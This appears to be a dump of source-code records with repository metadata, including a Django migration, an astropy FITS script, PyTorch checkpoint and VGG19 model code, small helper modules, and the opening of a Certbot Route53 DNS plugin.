] | null | null | null | src/accounts/migrations/0005_auto_20180606_0601.py | ciphertz/final | 28cf265b0e3f1e71cd95d2bd90b5662ad6f3d4a6 | [
"bzip2-1.0.6"
] | null | null | null | src/accounts/migrations/0005_auto_20180606_0601.py | ciphertz/final | 28cf265b0e3f1e71cd95d2bd90b5662ad6f3d4a6 | [
"bzip2-1.0.6"
] | null | null | null | # Generated by Django 2.0.6 on 2018-06-06 06:01
from django.conf import settings
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('accounts', '0004_userstripe'),
]
operations = [
migrations.RenameModel(
old_name='userStripe',
new_name='StripeAccount',
),
]
| 21.7 | 66 | 0.647465 |
from django.conf import settings
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('accounts', '0004_userstripe'),
]
operations = [
migrations.RenameModel(
old_name='userStripe',
new_name='StripeAccount',
),
]
| true | true |
f7192fe132fcf5d6519186205108fc34b3226385 | 759 | py | Python | Week1/brightest_pixel_position_fits.py | vinayak1998/Data_Driven_Astronomy | 1d0dd82b2e9066759c442807c30c70bef096d719 | [
"MIT"
] | 2 | 2021-05-21T07:31:49.000Z | 2022-03-28T05:25:44.000Z | Week1/brightest_pixel_position_fits.py | vinayak1998/Data_Driven_Astronomy | 1d0dd82b2e9066759c442807c30c70bef096d719 | [
"MIT"
] | null | null | null | Week1/brightest_pixel_position_fits.py | vinayak1998/Data_Driven_Astronomy | 1d0dd82b2e9066759c442807c30c70bef096d719 | [
"MIT"
] | 4 | 2020-11-24T21:12:16.000Z | 2021-09-18T12:26:45.000Z | import numpy as np
import time
from astropy.io import fits
import matplotlib.pyplot as plt
def load_fits(filename):
start = time.perf_counter()
hdulist = fits.open(filename)
data = hdulist[0].data
result = np.where(data == np.amax(data))
coornidates = list(zip(result[0],result[1]))
end = time.perf_counter() - start
return coornidates[0]
if __name__ == '__main__':
# Run your `load_fits` function with examples:
bright = load_fits('image1.fits')
print(bright)
# You can also confirm your result visually:
from astropy.io import fits
import matplotlib.pyplot as plt
hdulist = fits.open('image1.fits')
data = hdulist[0].data
# Plot the 2D image data
plt.imshow(data.T, cmap=plt.cm.viridis)
plt.colorbar()
plt.show() | 25.3 | 48 | 0.708827 | import numpy as np
import time
from astropy.io import fits
import matplotlib.pyplot as plt
def load_fits(filename):
start = time.perf_counter()
hdulist = fits.open(filename)
data = hdulist[0].data
result = np.where(data == np.amax(data))
coornidates = list(zip(result[0],result[1]))
end = time.perf_counter() - start
return coornidates[0]
if __name__ == '__main__':
bright = load_fits('image1.fits')
print(bright)
from astropy.io import fits
import matplotlib.pyplot as plt
hdulist = fits.open('image1.fits')
data = hdulist[0].data
plt.imshow(data.T, cmap=plt.cm.viridis)
plt.colorbar()
plt.show() | true | true |
f719309e5d9927ab6c3ee41678119a9d8e7d506c | 3,816 | py | Python | development/multiImage_pytorch/persistence.py | anaikawadi/svbrdf-estimation | c977aa8448b2131af3960895afd1105d29e5484a | [
"MIT"
] | 14 | 2020-06-16T17:01:46.000Z | 2021-12-10T02:02:28.000Z | development/multiImage_pytorch/persistence.py | huanyingyunhan/svbrdf-estimation | 6c169b12210d2a92495c1ab1218dd3e4da0314a5 | [
"MIT"
] | 1 | 2021-08-08T17:28:36.000Z | 2021-08-13T17:20:47.000Z | development/multiImage_pytorch/persistence.py | huanyingyunhan/svbrdf-estimation | 6c169b12210d2a92495c1ab1218dd3e4da0314a5 | [
"MIT"
] | 5 | 2020-12-27T23:00:12.000Z | 2021-12-10T02:02:14.000Z | import gc
import json
import pathlib
import torch
class Checkpoint:
def __init__(self, checkpoint=None):
self.checkpoint = checkpoint
@staticmethod
def get_checkpoint_path(checkpoint_dir):
return checkpoint_dir.joinpath("checkpoint.tar")
@staticmethod
def load_legacy(model_dir):
model_path = model_dir.joinpath("model.data")
state_path = model_dir.joinpath("state.json")
if not model_path.exists():
return None
checkpoint = {
'model_state_dict' : torch.load(model_path),
}
print("Loaded legacy model state")
if state_path.exists():
with open(state_path, 'r') as f:
state = json.load(f)
checkpoint['epoch'] = state['epoch']
print("Loaded legacy training state")
return checkpoint
@classmethod
def load(cls, checkpoint_dir):
if not isinstance(checkpoint_dir, pathlib.Path):
checkpoint_dir = pathlib.Path(checkpoint_dir)
checkpoint_path = Checkpoint.get_checkpoint_path(checkpoint_dir)
if not checkpoint_path.exists():
# If there is no checkpoint file we try to perform a legacy load
checkpoint = Checkpoint.load_legacy(checkpoint_dir)
if checkpoint is None:
print("No checkpoint found in directory '{}'".format(checkpoint_dir))
return cls(checkpoint)
return cls(torch.load(checkpoint_path))
@staticmethod
def save(checkpoint_dir, args, model, optimizer, epoch):
if not isinstance(checkpoint_dir, pathlib.Path):
checkpoint_dir = pathlib.Path(checkpoint_dir)
checkpoint_dir.mkdir(parents=True, exist_ok=True)
checkpoint = {
'model_type' : args.model_type,
'use_coords' : True if args.use_coords else False,
'epoch' : epoch,
'model_state_dict': model.state_dict(),
}
if not args.omit_optimizer_state_save:
checkpoint['optimizer_state_dict'] = optimizer.state_dict()
torch.save(checkpoint, Checkpoint.get_checkpoint_path(checkpoint_dir))
def purge(self):
self.checkpoint = None
gc.collect()
def is_valid(self):
return self.checkpoint is not None
def restore_args(self, args):
# Restore checkpoint relevant arguments
if 'model_type' in self.checkpoint:
args.model_type = self.checkpoint['model_type']
print("Restored model type '{}'".format(args.model_type))
else:
print("Failed to restore model type")
if 'use_coords' in self.checkpoint:
args.use_coords = self.checkpoint['use_coords']
print("Restored use coords flag '{}'".format(args.use_coords))
else:
print("Failed to restore use coords flag")
return args
def restore_model_state(self, model):
if 'model_state_dict' in self.checkpoint:
model.load_state_dict(self.checkpoint['model_state_dict'])
print("Restored model state")
else:
print("Failed to restore model state")
return model
def restore_epoch(self, epoch):
if 'epoch' in self.checkpoint:
epoch = self.checkpoint['epoch']
print("Restored epoch {}".format(epoch))
else:
print("Failed to restore epoch")
return epoch
def restore_optimizer_state(self, optimizer):
if 'optimizer_state_dict' in self.checkpoint:
optimizer.load_state_dict(self.checkpoint['optimizer_state_dict'])
print("Restored optimizer state")
else:
print("Failed to restore optimizer state")
return optimizer
| 31.02439 | 85 | 0.619759 | import gc
import json
import pathlib
import torch
class Checkpoint:
def __init__(self, checkpoint=None):
self.checkpoint = checkpoint
@staticmethod
def get_checkpoint_path(checkpoint_dir):
return checkpoint_dir.joinpath("checkpoint.tar")
@staticmethod
def load_legacy(model_dir):
model_path = model_dir.joinpath("model.data")
state_path = model_dir.joinpath("state.json")
if not model_path.exists():
return None
checkpoint = {
'model_state_dict' : torch.load(model_path),
}
print("Loaded legacy model state")
if state_path.exists():
with open(state_path, 'r') as f:
state = json.load(f)
checkpoint['epoch'] = state['epoch']
print("Loaded legacy training state")
return checkpoint
@classmethod
def load(cls, checkpoint_dir):
if not isinstance(checkpoint_dir, pathlib.Path):
checkpoint_dir = pathlib.Path(checkpoint_dir)
checkpoint_path = Checkpoint.get_checkpoint_path(checkpoint_dir)
if not checkpoint_path.exists():
checkpoint = Checkpoint.load_legacy(checkpoint_dir)
if checkpoint is None:
print("No checkpoint found in directory '{}'".format(checkpoint_dir))
return cls(checkpoint)
return cls(torch.load(checkpoint_path))
@staticmethod
def save(checkpoint_dir, args, model, optimizer, epoch):
if not isinstance(checkpoint_dir, pathlib.Path):
checkpoint_dir = pathlib.Path(checkpoint_dir)
checkpoint_dir.mkdir(parents=True, exist_ok=True)
checkpoint = {
'model_type' : args.model_type,
'use_coords' : True if args.use_coords else False,
'epoch' : epoch,
'model_state_dict': model.state_dict(),
}
if not args.omit_optimizer_state_save:
checkpoint['optimizer_state_dict'] = optimizer.state_dict()
torch.save(checkpoint, Checkpoint.get_checkpoint_path(checkpoint_dir))
def purge(self):
self.checkpoint = None
gc.collect()
def is_valid(self):
return self.checkpoint is not None
def restore_args(self, args):
if 'model_type' in self.checkpoint:
args.model_type = self.checkpoint['model_type']
print("Restored model type '{}'".format(args.model_type))
else:
print("Failed to restore model type")
if 'use_coords' in self.checkpoint:
args.use_coords = self.checkpoint['use_coords']
print("Restored use coords flag '{}'".format(args.use_coords))
else:
print("Failed to restore use coords flag")
return args
def restore_model_state(self, model):
if 'model_state_dict' in self.checkpoint:
model.load_state_dict(self.checkpoint['model_state_dict'])
print("Restored model state")
else:
print("Failed to restore model state")
return model
def restore_epoch(self, epoch):
if 'epoch' in self.checkpoint:
epoch = self.checkpoint['epoch']
print("Restored epoch {}".format(epoch))
else:
print("Failed to restore epoch")
return epoch
def restore_optimizer_state(self, optimizer):
if 'optimizer_state_dict' in self.checkpoint:
optimizer.load_state_dict(self.checkpoint['optimizer_state_dict'])
print("Restored optimizer state")
else:
print("Failed to restore optimizer state")
return optimizer
| true | true |
f7193160ab5b74cc0bfaf421bd89b39fb7242385 | 1,594 | py | Python | models/helper.py | kobakobashu/posenet-python | 52290733504fd0a130cc2301bad5db761c14a4e9 | [
"Apache-2.0"
] | null | null | null | models/helper.py | kobakobashu/posenet-python | 52290733504fd0a130cc2301bad5db761c14a4e9 | [
"Apache-2.0"
] | 9 | 2021-05-03T01:38:46.000Z | 2021-07-14T13:13:25.000Z | models/helper.py | kobakobashu/posenet-python | 52290733504fd0a130cc2301bad5db761c14a4e9 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""Models helper
These are helper functions for models.
"""
import torch.optim as optim
import torch.nn as nn
from configs.supported_info import SUPPORTED_OPTIMIZER, SUPPORTED_CRITERION
def get_optimizer(cfg: object, network: object) -> object:
"""Get optimizer function
This is function to get optimizer.
Args:
cfg: Config of optimizer.
network: Network of model.
Returns:
Optimizer object.
Raises:
NotImplementedError: If the optimizer you want to use is not suppoeted.
"""
optimizer_name = cfg.name
if not optimizer_name:
return None
if optimizer_name not in SUPPORTED_OPTIMIZER:
raise NotImplementedError('The optimizer is not supported.')
if optimizer_name == "adam":
return optim.Adam(network.parameters(),
lr=cfg.lr,
weight_decay=cfg.decay)
def get_criterion(cfg: object) -> object:
"""Get criterion function
This is function to get criterion.
Args:
cfg: Config of criterion.
Returns:
Criterion object.
Raises:
NotImplementedError: If the criterion you want to use is not suppoeted.
"""
criterion_name = cfg.name
if not criterion_name:
return None
if criterion_name not in SUPPORTED_CRITERION:
raise NotImplementedError('The loss function is not supported.')
if criterion_name == "cross_entropy":
return nn.CrossEntropyLoss()
elif criterion_name == "nll_loss":
return nn.NLLLoss() | 21.835616 | 79 | 0.648055 |
import torch.optim as optim
import torch.nn as nn
from configs.supported_info import SUPPORTED_OPTIMIZER, SUPPORTED_CRITERION
def get_optimizer(cfg: object, network: object) -> object:
optimizer_name = cfg.name
if not optimizer_name:
return None
if optimizer_name not in SUPPORTED_OPTIMIZER:
raise NotImplementedError('The optimizer is not supported.')
if optimizer_name == "adam":
return optim.Adam(network.parameters(),
lr=cfg.lr,
weight_decay=cfg.decay)
def get_criterion(cfg: object) -> object:
criterion_name = cfg.name
if not criterion_name:
return None
if criterion_name not in SUPPORTED_CRITERION:
raise NotImplementedError('The loss function is not supported.')
if criterion_name == "cross_entropy":
return nn.CrossEntropyLoss()
elif criterion_name == "nll_loss":
return nn.NLLLoss() | true | true |
f719316890fdeb362381d720d148647e2cd07220 | 299 | py | Python | roll.py | intuited/legendlore | ed7942ebfe3724b09515d431f3f2031a94e60eda | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | roll.py | intuited/legendlore | ed7942ebfe3724b09515d431f3f2031a94e60eda | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | roll.py | intuited/legendlore | ed7942ebfe3724b09515d431f3f2031a94e60eda | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | from random import randint
from functools import partial
def roll3d6():
return sum(randint(1, 6) for i in range(3))
def roll4d6dl1():
dice = sorted(randint(1, 6) for i in range(4))
return sum(dice[1:])
def genchar(roll_method=roll4d6dl1):
return [roll_method() for i in range(6)]
| 23 | 50 | 0.692308 | from random import randint
from functools import partial
def roll3d6():
return sum(randint(1, 6) for i in range(3))
def roll4d6dl1():
dice = sorted(randint(1, 6) for i in range(4))
return sum(dice[1:])
def genchar(roll_method=roll4d6dl1):
return [roll_method() for i in range(6)]
| true | true |
f71931a377b93d7eb6f7878b5c0f35e19f2a5c5c | 1,092 | py | Python | python/cinn/__init__.py | Avin0323/CINN | 093217619c821e73cec15511fa54cb0026ed0476 | [
"Apache-2.0"
] | null | null | null | python/cinn/__init__.py | Avin0323/CINN | 093217619c821e73cec15511fa54cb0026ed0476 | [
"Apache-2.0"
] | null | null | null | python/cinn/__init__.py | Avin0323/CINN | 093217619c821e73cec15511fa54cb0026ed0476 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2021 CINN Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
cinndir = os.path.dirname(os.path.abspath(__file__))
runtime_include_dir = os.path.join(cinndir, "libs")
cuhfile = os.path.join(runtime_include_dir, "cinn_cuda_runtime_source.cuh")
if os.path.exists(cuhfile):
os.environ.setdefault('runtime_include_dir', runtime_include_dir)
from .core_api.common import *
from .core_api.backends import *
from .core_api.poly import *
from .core_api.ir import *
from .core_api.lang import *
from .version import full_version as __version__
| 37.655172 | 75 | 0.772894 |
import os
cinndir = os.path.dirname(os.path.abspath(__file__))
runtime_include_dir = os.path.join(cinndir, "libs")
cuhfile = os.path.join(runtime_include_dir, "cinn_cuda_runtime_source.cuh")
if os.path.exists(cuhfile):
os.environ.setdefault('runtime_include_dir', runtime_include_dir)
from .core_api.common import *
from .core_api.backends import *
from .core_api.poly import *
from .core_api.ir import *
from .core_api.lang import *
from .version import full_version as __version__
| true | true |
f7193471cea625250605c013d6247623e3656276 | 482 | py | Python | dynamic_menu/middleware.py | lessss4/oil-and-rope | b8b52609f928e8c9174b7339cbb85cc21bae4538 | [
"MIT"
] | null | null | null | dynamic_menu/middleware.py | lessss4/oil-and-rope | b8b52609f928e8c9174b7339cbb85cc21bae4538 | [
"MIT"
] | null | null | null | dynamic_menu/middleware.py | lessss4/oil-and-rope | b8b52609f928e8c9174b7339cbb85cc21bae4538 | [
"MIT"
] | null | null | null | class DynamicMenuMiddleware:
"""
Adds a cookie to track user when navigating our website, so we can
know which part of the web did he/she came from.
"""
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
response = self.get_response(request)
if '_auth_user_menu_referrer' not in request.COOKIES:
response.set_cookie('_auth_user_menu_referrer', None)
return response
| 32.133333 | 70 | 0.682573 | class DynamicMenuMiddleware:
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
response = self.get_response(request)
if '_auth_user_menu_referrer' not in request.COOKIES:
response.set_cookie('_auth_user_menu_referrer', None)
return response
| true | true |
f71935b8f3aa0244535d6d5bf915f0643fa098c5 | 5,892 | py | Python | Scripts_Model/scripts_pytorch/VGG19_pytorch.py | zhangziyezzy/DeepLearningMugenKnock | e306f436fb41b5549d0adf9ad331d638e5906e29 | [
"MIT"
] | 10 | 2021-12-17T06:07:25.000Z | 2022-03-25T13:50:05.000Z | Scripts_Model/scripts_pytorch/VGG19_pytorch.py | karaage0703/DeepLearningMugenKnock | 26830fe049c7da8001977ca0df12e946c0f030eb | [
"MIT"
] | null | null | null | Scripts_Model/scripts_pytorch/VGG19_pytorch.py | karaage0703/DeepLearningMugenKnock | 26830fe049c7da8001977ca0df12e946c0f030eb | [
"MIT"
] | 2 | 2022-03-15T02:42:09.000Z | 2022-03-30T23:19:55.000Z | import torch
import torch.nn.functional as F
import numpy as np
from collections import OrderedDict
from easydict import EasyDict
from _main_base import main
import os
#---
# config
#---
cfg = EasyDict()
# class
cfg.CLASS_LABEL = ['akahara', 'madara']
cfg.CLASS_NUM = len(cfg.CLASS_LABEL)
# model
cfg.INPUT_HEIGHT = 64
cfg.INPUT_WIDTH = 64
cfg.INPUT_CHANNEL = 3
cfg.GPU = False
cfg.DEVICE = torch.device("cuda" if cfg.GPU and torch.cuda.is_available() else "cpu")
cfg.MODEL_SAVE_PATH = 'models/VGG16_{}.pt'
cfg.MODEL_SAVE_INTERVAL = 200
cfg.ITERATION = 1000
cfg.MINIBATCH = 8
cfg.OPTIMIZER = torch.optim.SGD
cfg.LEARNING_RATE = 0.1
cfg.MOMENTUM = 0.9
cfg.LOSS_FUNCTION = loss_fn = torch.nn.NLLLoss()
cfg.TRAIN = EasyDict()
cfg.TRAIN.DISPAY_ITERATION_INTERVAL = 50
cfg.TRAIN.DATA_PATH = '../Dataset/train/images/'
cfg.TRAIN.DATA_HORIZONTAL_FLIP = True
cfg.TRAIN.DATA_VERTICAL_FLIP = True
cfg.TRAIN.DATA_ROTATION = False
cfg.TEST = EasyDict()
cfg.TEST.MODEL_PATH = cfg.MODEL_SAVE_PATH.format('final')
cfg.TEST.DATA_PATH = '../Dataset/test/images/'
cfg.TEST.MINIBATCH = 2
# random seed
torch.manual_seed(0)
class VGG19(torch.nn.Module):
def __init__(self):
super(VGG19, self).__init__()
self.conv1 = torch.nn.Sequential(OrderedDict({
'conv1_1' : torch.nn.Conv2d(cfg.INPUT_CHANNEL, 64, kernel_size=3, padding=1, stride=1),
'conv1_1_relu' : torch.nn.ReLU(),
'conv1_1_bn' : torch.nn.BatchNorm2d(64),
'conv1_2' : torch.nn.Conv2d(64, 64, kernel_size=3, padding=1, stride=1),
'conv1_2_relu' : torch.nn.ReLU(),
'conv1_2_bn' : torch.nn.BatchNorm2d(64),
}))
self.conv2 = torch.nn.Sequential(OrderedDict({
'conv2_1' : torch.nn.Conv2d(64, 128, kernel_size=3, padding=1, stride=1),
'conv2_1_relu' : torch.nn.ReLU(),
'conv2_1_bn' : torch.nn.BatchNorm2d(128),
'conv2_2' : torch.nn.Conv2d(128, 128, kernel_size=3, padding=1, stride=1),
'conv2_2_relu' : torch.nn.ReLU(),
'conv2_2_bn' : torch.nn.BatchNorm2d(128),
}))
self.conv3 = torch.nn.Sequential(OrderedDict({
'conv3_1' : torch.nn.Conv2d(128, 256, kernel_size=3, padding=1, stride=1),
'conv3_1_relu' : torch.nn.ReLU(),
'conv3_1_bn' : torch.nn.BatchNorm2d(256),
'conv3_2' : torch.nn.Conv2d(256, 256, kernel_size=3, padding=1, stride=1),
'conv3_2_relu' : torch.nn.ReLU(),
'conv3_2_bn' : torch.nn.BatchNorm2d(256),
'conv3_3' : torch.nn.Conv2d(256, 256, kernel_size=3, padding=1, stride=1),
'conv3_3_relu' : torch.nn.ReLU(),
'conv3_3_bn' : torch.nn.BatchNorm2d(256),
'conv3_4' : torch.nn.Conv2d(256, 256, kernel_size=3, padding=1, stride=1),
'conv3_4_relu' : torch.nn.ReLU(),
'conv3_4_bn' : torch.nn.BatchNorm2d(256),
}))
self.conv4 = torch.nn.Sequential(OrderedDict({
'conv4_1' : torch.nn.Conv2d(256, 512, kernel_size=3, padding=1, stride=1),
'conv4_1_relu' : torch.nn.ReLU(),
'conv4_1_bn' : torch.nn.BatchNorm2d(512),
'conv4_2' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv4_2_relu' : torch.nn.ReLU(),
'conv4_2_bn' : torch.nn.BatchNorm2d(512),
'conv4_3' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv4_3_relu' : torch.nn.ReLU(),
'conv4_3_bn' : torch.nn.BatchNorm2d(512),
'conv4_4' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv4_4_relu' : torch.nn.ReLU(),
'conv4_4_bn' : torch.nn.BatchNorm2d(512),
}))
self.conv5 = torch.nn.Sequential(OrderedDict({
'conv5_1' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv5_1_relu' : torch.nn.ReLU(),
'conv5_1_bn' : torch.nn.BatchNorm2d(512),
'conv5_2' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv5_2_relu' : torch.nn.ReLU(),
'conv5_2_bn' : torch.nn.BatchNorm2d(512),
'conv5_3' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv5_3_relu' : torch.nn.ReLU(),
'conv5_3_bn' : torch.nn.BatchNorm2d(512),
'conv5_3' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv5_3_relu' : torch.nn.ReLU(),
'conv5_3_bn' : torch.nn.BatchNorm2d(512),
}))
self.top = torch.nn.Sequential(OrderedDict({
'Dense1' : torch.nn.Linear(512 * (cfg.INPUT_HEIGHT // 32) * (cfg.INPUT_WIDTH // 32), 256),
'Dense1_relu' : torch.nn.ReLU(),
'Dense1_dropout' : torch.nn.Dropout(p=0.5),
'Dense2' : torch.nn.Linear(256, 256),
'Dense2_relu' : torch.nn.ReLU(),
'Dense2_dropout' : torch.nn.Dropout(p=0.5),
}))
self.fc_out = torch.nn.Linear(256, cfg.CLASS_NUM)
def forward(self, x):
# block conv1
x = self.conv1(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
# block conv2
x = self.conv2(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
# block conv3
x = self.conv3(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
# block conv4
x = self.conv4(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
# block conv5
x = self.conv5(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
x = x.view(x.shape[0], -1)
x = self.top(x)
x = self.fc_out(x)
x = F.softmax(x, dim=1)
return x
# main
if __name__ == '__main__':
model_save_dir = '/'.join(cfg.MODEL_SAVE_PATH.split('/')[:-1])
os.makedirs(model_save_dir, exist_ok=True)
main(cfg, VGG19()) | 35.926829 | 102 | 0.593856 | import torch
import torch.nn.functional as F
import numpy as np
from collections import OrderedDict
from easydict import EasyDict
from _main_base import main
import os
cfg = EasyDict()
cfg.CLASS_LABEL = ['akahara', 'madara']
cfg.CLASS_NUM = len(cfg.CLASS_LABEL)
cfg.INPUT_HEIGHT = 64
cfg.INPUT_WIDTH = 64
cfg.INPUT_CHANNEL = 3
cfg.GPU = False
cfg.DEVICE = torch.device("cuda" if cfg.GPU and torch.cuda.is_available() else "cpu")
cfg.MODEL_SAVE_PATH = 'models/VGG16_{}.pt'
cfg.MODEL_SAVE_INTERVAL = 200
cfg.ITERATION = 1000
cfg.MINIBATCH = 8
cfg.OPTIMIZER = torch.optim.SGD
cfg.LEARNING_RATE = 0.1
cfg.MOMENTUM = 0.9
cfg.LOSS_FUNCTION = loss_fn = torch.nn.NLLLoss()
cfg.TRAIN = EasyDict()
cfg.TRAIN.DISPAY_ITERATION_INTERVAL = 50
cfg.TRAIN.DATA_PATH = '../Dataset/train/images/'
cfg.TRAIN.DATA_HORIZONTAL_FLIP = True
cfg.TRAIN.DATA_VERTICAL_FLIP = True
cfg.TRAIN.DATA_ROTATION = False
cfg.TEST = EasyDict()
cfg.TEST.MODEL_PATH = cfg.MODEL_SAVE_PATH.format('final')
cfg.TEST.DATA_PATH = '../Dataset/test/images/'
cfg.TEST.MINIBATCH = 2
torch.manual_seed(0)
class VGG19(torch.nn.Module):
def __init__(self):
super(VGG19, self).__init__()
self.conv1 = torch.nn.Sequential(OrderedDict({
'conv1_1' : torch.nn.Conv2d(cfg.INPUT_CHANNEL, 64, kernel_size=3, padding=1, stride=1),
'conv1_1_relu' : torch.nn.ReLU(),
'conv1_1_bn' : torch.nn.BatchNorm2d(64),
'conv1_2' : torch.nn.Conv2d(64, 64, kernel_size=3, padding=1, stride=1),
'conv1_2_relu' : torch.nn.ReLU(),
'conv1_2_bn' : torch.nn.BatchNorm2d(64),
}))
self.conv2 = torch.nn.Sequential(OrderedDict({
'conv2_1' : torch.nn.Conv2d(64, 128, kernel_size=3, padding=1, stride=1),
'conv2_1_relu' : torch.nn.ReLU(),
'conv2_1_bn' : torch.nn.BatchNorm2d(128),
'conv2_2' : torch.nn.Conv2d(128, 128, kernel_size=3, padding=1, stride=1),
'conv2_2_relu' : torch.nn.ReLU(),
'conv2_2_bn' : torch.nn.BatchNorm2d(128),
}))
self.conv3 = torch.nn.Sequential(OrderedDict({
'conv3_1' : torch.nn.Conv2d(128, 256, kernel_size=3, padding=1, stride=1),
'conv3_1_relu' : torch.nn.ReLU(),
'conv3_1_bn' : torch.nn.BatchNorm2d(256),
'conv3_2' : torch.nn.Conv2d(256, 256, kernel_size=3, padding=1, stride=1),
'conv3_2_relu' : torch.nn.ReLU(),
'conv3_2_bn' : torch.nn.BatchNorm2d(256),
'conv3_3' : torch.nn.Conv2d(256, 256, kernel_size=3, padding=1, stride=1),
'conv3_3_relu' : torch.nn.ReLU(),
'conv3_3_bn' : torch.nn.BatchNorm2d(256),
'conv3_4' : torch.nn.Conv2d(256, 256, kernel_size=3, padding=1, stride=1),
'conv3_4_relu' : torch.nn.ReLU(),
'conv3_4_bn' : torch.nn.BatchNorm2d(256),
}))
self.conv4 = torch.nn.Sequential(OrderedDict({
'conv4_1' : torch.nn.Conv2d(256, 512, kernel_size=3, padding=1, stride=1),
'conv4_1_relu' : torch.nn.ReLU(),
'conv4_1_bn' : torch.nn.BatchNorm2d(512),
'conv4_2' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv4_2_relu' : torch.nn.ReLU(),
'conv4_2_bn' : torch.nn.BatchNorm2d(512),
'conv4_3' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv4_3_relu' : torch.nn.ReLU(),
'conv4_3_bn' : torch.nn.BatchNorm2d(512),
'conv4_4' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv4_4_relu' : torch.nn.ReLU(),
'conv4_4_bn' : torch.nn.BatchNorm2d(512),
}))
self.conv5 = torch.nn.Sequential(OrderedDict({
'conv5_1' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv5_1_relu' : torch.nn.ReLU(),
'conv5_1_bn' : torch.nn.BatchNorm2d(512),
'conv5_2' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv5_2_relu' : torch.nn.ReLU(),
'conv5_2_bn' : torch.nn.BatchNorm2d(512),
'conv5_3' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv5_3_relu' : torch.nn.ReLU(),
'conv5_3_bn' : torch.nn.BatchNorm2d(512),
'conv5_3' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
'conv5_3_relu' : torch.nn.ReLU(),
'conv5_3_bn' : torch.nn.BatchNorm2d(512),
}))
self.top = torch.nn.Sequential(OrderedDict({
'Dense1' : torch.nn.Linear(512 * (cfg.INPUT_HEIGHT // 32) * (cfg.INPUT_WIDTH // 32), 256),
'Dense1_relu' : torch.nn.ReLU(),
'Dense1_dropout' : torch.nn.Dropout(p=0.5),
'Dense2' : torch.nn.Linear(256, 256),
'Dense2_relu' : torch.nn.ReLU(),
'Dense2_dropout' : torch.nn.Dropout(p=0.5),
}))
self.fc_out = torch.nn.Linear(256, cfg.CLASS_NUM)
def forward(self, x):
x = self.conv1(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
x = self.conv2(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
x = self.conv3(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
x = self.conv4(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
x = self.conv5(x)
x = F.max_pool2d(x, 2, stride=2, padding=0)
x = x.view(x.shape[0], -1)
x = self.top(x)
x = self.fc_out(x)
x = F.softmax(x, dim=1)
return x
if __name__ == '__main__':
model_save_dir = '/'.join(cfg.MODEL_SAVE_PATH.split('/')[:-1])
os.makedirs(model_save_dir, exist_ok=True)
main(cfg, VGG19()) | true | true |
f71935de250e0719a42fab6dc8ca47d5eff65661 | 5,961 | py | Python | certbot-dns-route53/certbot_dns_route53/dns_route53.py | tsrivishnu/certbot | 81f02e5578819220e0b4e15a9ceca9b77fff436e | [
"Apache-2.0"
] | 4 | 2020-04-09T21:57:23.000Z | 2020-04-11T13:26:54.000Z | certbot-dns-route53/certbot_dns_route53/dns_route53.py | tsrivishnu/certbot | 81f02e5578819220e0b4e15a9ceca9b77fff436e | [
"Apache-2.0"
] | 32 | 2019-02-20T14:51:48.000Z | 2019-02-27T10:11:34.000Z | certbot-dns-route53/certbot_dns_route53/dns_route53.py | tsrivishnu/certbot | 81f02e5578819220e0b4e15a9ceca9b77fff436e | [
"Apache-2.0"
] | 3 | 2019-03-21T23:21:38.000Z | 2020-06-23T20:56:56.000Z | """Certbot Route53 authenticator plugin."""
import collections
import logging
import time
import boto3
import zope.interface
from botocore.exceptions import NoCredentialsError, ClientError
from certbot import errors
from certbot import interfaces
from certbot.plugins import dns_common
from acme.magic_typing import DefaultDict, List, Dict # pylint: disable=unused-import, no-name-in-module
logger = logging.getLogger(__name__)
INSTRUCTIONS = (
"To use certbot-dns-route53, configure credentials as described at "
"https://boto3.readthedocs.io/en/latest/guide/configuration.html#best-practices-for-configuring-credentials " # pylint: disable=line-too-long
"and add the necessary permissions for Route53 access.")
@zope.interface.implementer(interfaces.IAuthenticator)
@zope.interface.provider(interfaces.IPluginFactory)
class Authenticator(dns_common.DNSAuthenticator):
"""Route53 Authenticator
This authenticator solves a DNS01 challenge by uploading the answer to AWS
Route53.
"""
description = ("Obtain certificates using a DNS TXT record (if you are using AWS Route53 for "
"DNS).")
ttl = 10
def __init__(self, *args, **kwargs):
